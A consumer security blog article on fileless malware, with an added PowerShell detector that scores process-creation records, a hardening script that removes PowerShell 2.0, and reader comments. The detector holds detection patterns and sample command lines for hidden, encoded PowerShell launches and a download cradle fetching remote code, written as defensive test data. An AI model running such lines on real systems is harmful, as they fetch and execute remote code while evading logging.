Fileless Malware: The Ghost in Your Computer
A clever but pernicious software technique that has been known for more than a decade is being adopted by today's malware authors, complicating the work of anti-virus developers and digital forensic analysts. Tracking down so-called "fileless malware" is to detecting regular malware what ghost-hunting is to catching a garden-variety burglar. Read on to learn about this resurgent threat and what you can do to stop it...
What is Fileless Malware?
Traditional malware consists of one or more files stored on disk. At least one of them is executable, and the malware can do no harm until that file runs. Fileless malware, in contrast, lives only in memory (RAM) and is never written to your hard drive as an executable file. In between sits semi-fileless malware: some seemingly harmless pieces (a document macro, a registry entry or a scheduled task, for example) are stored on disk, while the parts that actually do the work stay in memory or are fetched from a remote server each time they run.
Files leave traces. Every read and write touches the file system, and a file's contents can be reduced to a static signature (a hash or a byte pattern) and compared with the signatures in an antivirus database. These and other traits of files make it far easier to work out what a file-based malware package is and where it came from.
Rather than tricking the user into downloading and running an executable, fileless malware does its dirty work through legitimate, trusted tools that ship with the operating system, Windows PowerShell and Windows Management Instrumentation (WMI) chief among them. So there is no suspicious program on the hard drive, and the process that is active in memory is a signed Microsoft binary; only the instructions it has been handed are malicious. That is the "ghost" lurking in system memory.
Fileless malware is fluid. Because the malicious code exists only as instructions fed to a legitimate process, it can run inside any process willing to execute them, and it leaves behind no file whose bytes could be hashed and matched. Antivirus software that only scans files on disk for known signatures is therefore looking for the wrong thing, a signature, in the wrong place, the hard disk, while the action is happening in main memory.
Fileless attacks are often said to be about ten times more likely to succeed than file-based attacks (the figure comes from a widely cited 2017 Ponemon Institute survey of endpoint security). Fileless techniques were reportedly used in the 2017 Equifax breach, which exposed the personal information of roughly 147 million consumers. But effective anti-malware can also catch the shapeshifting ghost. Instead of asking what the code is, it watches what the code does: which process started it (Microsoft Word spawning PowerShell is a classic red flag), what command line it was given, what it loads into memory, and what it talks to over the Internet. Windows also hands the content of a script to security products through the Antimalware Scan Interface (AMSI) just before it runs, so a script that was obfuscated on the wire can still be inspected in the clear. What the ghost does becomes the important thing, not what it is.
Does the ghost call PowerShell? A behaviour-based product can hold that call until the script and the process that launched it have been examined and judged benign. Does the ghost send data out to the Internet? Where to, and from which process, is checked before the connection is allowed. All of this has to happen in real time, before the suspicious activity completes, so the monitoring component must itself be resident in memory, hooking process creation, script execution and network calls as they occur. That constraint limits how much analysis the ghost-hunter can afford per event, and it is why behavioural protection costs more in system performance than a scheduled disk scan.
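Here is what "judging the ghost by what it does" looks like in practice. This is an added example, not code from the article or from any anti-malware product: a PowerShell function that scores process-creation records by parent process and command-line traits. The records are constructed for the example and shaped like the Image, ParentImage and CommandLine fields of a Sysmon Event ID 1 entry; the suspicious-parent list, the regular expressions and the two-hit alert threshold are this example's own choices.

```powershell
# Added example (not from the original article): classify PowerShell launches by
# behaviour, not by a file signature. The records below are constructed and shaped
# like the Image / ParentImage / CommandLine fields of a Sysmon Event ID 1 entry;
# a real deployment would read them from the Sysmon or Security event log.

# Parents that have no legitimate reason to spawn a shell on a typical desktop.
$SuspiciousParents = @('WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE',
                       'wscript.exe', 'cscript.exe', 'mshta.exe')

# Command-line traits of in-memory loaders and of AMSI / logging evasion.
$SuspiciousPatterns = @(
    @{ Name = 'EncodedCommand';   Regex = '(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}' }
    @{ Name = 'DownloadCradle';   Regex = '(?i)(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b)' }
    @{ Name = 'InvokeExpression'; Regex = '(?i)(Invoke-Expression|\biex\b)' }
    @{ Name = 'HiddenWindow';     Regex = '(?i)-w(indowstyle)?\s+hidden' }
    @{ Name = 'BypassPolicy';     Regex = '(?i)-e(p|x|xecutionpolicy)\s+bypass' }
    @{ Name = 'V2Downgrade';      Regex = '(?i)-v(ersion)?\s+2\b' }
    @{ Name = 'ReflectiveLoad';   Regex = '(?i)(FromBase64String|\[Reflection\.Assembly\]::Load)' }
)

function Get-FilelessIndicators {
    param([Parameter(Mandatory)] [hashtable] $Record)

    # Only PowerShell launches are scored here; other images pass straight through.
    if ($Record.Image -notmatch '(?i)\\(powershell|pwsh)\.exe$') { return @() }

    $hits = @()
    if ($SuspiciousParents -contains (Split-Path -Path $Record.ParentImage -Leaf)) {
        $hits += 'OfficeOrScriptHostParent'
    }
    foreach ($p in $SuspiciousPatterns) {
        if ($Record.CommandLine -match $p.Regex) { $hits += $p.Name }
    }
    return $hits
}

function Get-Verdict {
    param([string[]] $Indicators)
    # Two independent traits together are rarely benign; one alone deserves a look.
    switch ($Indicators.Count) {
        0       { 'ok' }
        1       { 'REVIEW' }
        default { 'ALERT' }
    }
}

# Constructed sample records. The base64 blob decodes (UTF-16LE) to the harmless
# fragment "IEX (New-Object Net.WebClient)"; example.invalid is a reserved name.
$SampleRecords = @(
    @{ ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA' }
    @{ ParentImage = 'C:\Windows\System32\wscript.exe'
       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell -version 2 -nop -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/a'')"' }
    @{ ParentImage = 'C:\Windows\explorer.exe'
       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1' }
    @{ ParentImage = 'C:\Windows\explorer.exe'
       Image       = 'C:\Windows\System32\notepad.exe'
       CommandLine = 'notepad.exe C:\Users\alice\notes.txt' }
)

foreach ($r in $SampleRecords) {
    $ind = @(Get-FilelessIndicators -Record $r)
    '{0,-6} {1,-12} -> {2}' -f (Get-Verdict $ind), (Split-Path -Path $r.ParentImage -Leaf), ($ind -join ', ')
}
```

The first two records trip four indicators each and land as ALERT (Word or a script host launching a hidden, encoded or downgraded PowerShell that pulls code from the network); the backup script launched from Explorer and the Notepad launch score nothing. Note that not one of these judgements looked at a file on disk: the same signed powershell.exe appears in every record, and only the parent and the command line separate the attack from the nightly backup.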
Digging Deeper
Fileless malware poses many other challenges for the defenders. I hope these examples give you some appreciation for the prowess of the anti-malware developers who keep us safe from much of this nasty stuff, if not all of it. Malwarebytes' Vasilios Hioureas covers fileless malware in excruciating geekly detail in an ongoing series of articles.
To be honest, even after reading these highly technical articles, I was still a bit confused about exactly how fileless malware sneaks into a computer. Suffice it to say that under the right conditions, some combination of unpatched vulnerabilities, a zero-day exploit, a compromised website, a careless click on an email link, an infected document (or perhaps a fragment of an underdone potato) can trigger a fileless malware attack. The common thread is that the initial foothold, whether a macro in a document, a script on a compromised web page or an exploit for an unpatched flaw, does not drop an executable. It passes malicious instructions to a legitimate program already on the machine, typically PowerShell, which dutifully carries out the attack in memory.
Traditional anti-virus programs that rely only on file-based scanning will not stop these attacks. Avast, Avira and Bitdefender do claim to protect against this threat, but I had to dig deep on their websites to find it. Malwarebytes has done a lot of research on this type of malware and seems to understand the mitigation strategies well.
PC Matic, my preferred anti-malware tool, differentiates itself by focusing on emerging polymorphic threats and fileless ransomware detection. If you missed it, see my review: PC Matic 4.0 – My Review.
It's important to keep yourself aware of emerging threats and take action where you can to protect yourself, your computer, and your important data. Keeping your operating system, application software and anti-malware defenses updated is an important first step. (See Here's Why You Must Keep Your Software Updated and how to do it for free.)
And since many fileless attacks rely on Windows PowerShell, there is one hardening step I recommend: removing the legacy PowerShell 2.0 engine. To be clear, this does not turn off PowerShell. PowerShell 5.1 is built into Windows 10/11, is not listed under Windows Features, and is used by Windows itself and by many management tools, so leave it in place. What the checkbox below removes is the old 2.0 engine, which predates the Antimalware Scan Interface and PowerShell's script logging; attackers launch powershell.exe -Version 2 precisely to run their scripts with those protections switched off. Removing it closes that loophole with no effect on normal use. To do so, follow these steps:
- Type windows features in the Windows 10/11 search box, and press ENTER.
- Scroll down to the Windows PowerShell 2.0 line item (if it isn't listed, the 2.0 engine isn't installed on your build).
- Uncheck the box next to it, and click OK.
- Restart your computer when prompted.
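The same steps, plus the logging that makes whatever PowerShell still runs auditable, as an added script (not from the article; run it in an elevated PowerShell window on Windows 10/11). MicrosoftWindowsPowerShellV2Root is the optional-feature name behind the Windows PowerShell 2.0 checkbox, and the ScriptBlockLogging registry key is the one Group Policy writes; both are real names, everything else here is this example's own sequencing.

```powershell
# Added example (not from the original article). Removes the legacy PowerShell 2.0
# engine (no AMSI, no script block logging, the target of "-Version 2" downgrade
# attacks) and turns on script block logging for the engine that remains.
# Run from an elevated PowerShell session on Windows 10/11.

#Requires -RunAsAdministrator

# 1. Remove the optional PowerShell 2.0 engine. This is the same item as the
#    "Windows PowerShell 2.0" checkbox under Windows Features.
$v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
if ($v2.State -eq 'Enabled') {
    Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null
    Write-Host 'PowerShell 2.0 engine removed; restart when convenient.'
} else {
    Write-Host "PowerShell 2.0 engine is already in state: $($v2.State)"
}

# 2. Confirm the downgrade path is closed. With the 2.0 engine gone, this launch
#    fails with a missing-.NET-2.0 error instead of starting an unlogged session;
#    while the engine is still present it reports its major version.
& "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 2 -NoProfile -Command '$PSVersionTable.PSVersion.Major' 2>$null

# 3. Enable script block logging so the content of every script block that does
#    run is written to Microsoft-Windows-PowerShell/Operational as Event ID 4104.
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $key -Force | Out-Null
Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord

# 4. Show what remains. PowerShell 5.1 is not an optional feature and stays put;
#    Windows and its management tooling depend on it.
$PSVersionTable.PSVersion
```

If step 2 still prints 2 after the feature shows as disabled, reboot and run it again; the engine's files are not always released until then. The script block logs land in Event Viewer under Applications and Services Logs > Microsoft > Windows > PowerShell > Operational, which is exactly where a behaviour-based product or a SIEM looks to see what the ghost actually ran, encoded command lines included, because the logged text is the decoded script.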
Have you been affected by fileless malware, or has your security tool detected an instance of it? Your thoughts on this topic are welcome. Post your comment or question below.
This article was posted by Bob Rankin on 30 Mar 2023
Source: https://askbobrankin.com/fileless_malware_the_ghost_in_your_computer.html
Copyright © 2005 - Bob Rankin - All Rights Reserved
Most recent comments on "Fileless Malware: The Ghost in Your Computer"
Posted by:
The 146%
30 Mar 2023
So if this actually happens to your PC.....
....."Who you gonna call?"
Posted by:
Steve
30 Mar 2023
I still use W7 & there doesn't appear to be a Windows PowerShell 2.0 option to switch off?
Posted by:
Bob S
30 Mar 2023
Is there any downside to turning off PowerShell?
Posted by:
John
30 Mar 2023
I agree with Bob S. I hesitate to do anything that may have unintended consequences.
Posted by:
cho
30 Mar 2023
Actually, I believe it is not really "fileless"; it is just not a resident file. The intruding file information is transient. It is introduced at the time of execution from an external source, such as an email attachment or web page content, as the user fetches it from online. The file is only briefly on the storage medium of your computer, but it is a file nevertheless.
Posted by:
Bob K
31 Mar 2023
How does this work for us users of Linux? Can the thing that got installed in RAM in a Windows machine be able to be installed under Linux? And, if so, can it still do damage?
Posted by:
Oldster
31 Mar 2023
I use Windows Security as my primary antimalware suite. It includes a feature named Memory Integrity, which prevents attacks from inserting malicious code into high-security processes (per the Windows Security description). I have the free version of Malwarebytes installed (it scans memory as part of the scan), and I scan my computer on the first day of each month as one of my System/Security Maintenance routines. I am very cautious/skeptical of anything coming from the Internet (such as website or email message links). Before I click a link, I check to see where it will take me. If I have any doubts (or I cannot identify the URL), I don't click.
The single most important thing anyone can do to avoid malware of any kind is to employ Cognitive Security, which involves developing safe web browsing practices combined with a very skeptical attitude toward anything a user may encounter on the Internet. For most links, you can hover your mouse over it to see the URL. If not (red flag), try copying the link and pasting it into a text editor window. If you have any doubts about the validity of the link, try performing a who-is Internet search with your web browser (search for "who is", then use the URL you pasted into the text editor window on the who-is web site to learn whatever you can about it). If you are not familiar with the who-is service, use links like the URL to askbobrankin.com and google.com to experiment. You should get a feel for what to expect.
The bottom line is, if you have any doubts about a link, don't click it! If you have any doubts about a URL, don't use it! The same skepticism applies to anything you find (see, hear, etc.) on the Internet. If you cannot confirm its validity, don't believe it until you can, especially if it reinforces or enhances your current beliefs, because you cannot know the author's agenda/motivation. A user with a healthy level of skepticism questions everything, then picks and chooses what (s)he believes after careful research.
My2Cents, I hope it helps others,
Ernie
Posted by:
Gilles Lalancette
31 Mar 2023
Thanks for the info. I did turn off PowerShell following your directions.
I have been a reader of your chronicle for many years and I appreciate it very much.
Again, thank you for your knowledgeable help.
Posted by:
gene
31 Mar 2023
I've had Malwarebytes Pro for many years, got a lifetime subscription for $25 back when they were still pretty new. Transferable license to any new pc I buy, so that is always on, always running. Have never had a virus or piece of malware make it to my system. I do have Windows Defender running at the same time, they work well together, not always the case with various programs. But, imo, Malwarebytes is still the gold standard and it's good to hear they're aware of this.
Posted by:
Sandy Jankowski
31 Mar 2023
1/ YOUR ADVICE: 'windows features' does not show anything regarding PowerShell
2/ MALWAREBYTES:
running it: "Unable to connect the Service"
Trying to uninstall MB: "We encountered a problem during uninstall. Please download the Malware Support Tool or contact Malwarebytes Support for help."
Running the tool: "Unable to connect the Service"
h e l p !
Posted by:
Karen
24 Apr 2023
What are the disadvantages of turning off PowerShell, and will I ever need to turn it back on for something?